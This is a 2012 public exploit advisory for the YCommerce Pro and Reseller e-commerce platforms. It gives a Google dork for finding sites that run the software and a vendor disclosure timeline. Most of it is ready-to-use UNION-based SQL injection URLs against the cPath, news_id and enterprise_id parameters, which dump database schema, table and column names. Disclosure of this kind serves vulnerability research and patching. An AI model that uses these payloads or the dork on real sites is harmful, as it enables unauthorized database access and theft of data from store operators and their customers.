YCommerce Pro / Reseller suffers from a remote SQL injection vulnerability.
674c1ec52b72be8da7c68b254c57f1fa20b169ec82242c6089ef21eab6bd8f64
# Exploit Title: YCommerce Pro/Reseller SQL Injection Vulnerability
# Google Dork: intext:desenvolvido por partteam.com - Plataforma YCommerce
# Date: 2012-09-21
# Exploit Author: Ricardo Almeida ricardojba@aeiou.pt
# Vendor Homepage: http://www.partteam.com
# Software Link: N/A
# Version: YCommerce Pro and YCommerce Reseller
# Tested on: N/A
# CVE: N/A
-- Affected Vendors:
---------------------
Partteam [M.S.N.F Soluções Informáticas, Lda.]
-- Affected Products:
---------------------
YCommerce [Reseller and Pro versions]
-- Disclosure Timeline:
-----------------------
2012-08-20 - Vendor Notification.
2012-08-30 - New Vendor Notification.
2012-09-20 - No Vendor Response / Feedback till date.
2012-09-21 - Public Disclosure.
Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
-- Disclaimer:
--------------
The information provided in this advisory is provided as it is without any warranty.
I am not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
I do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.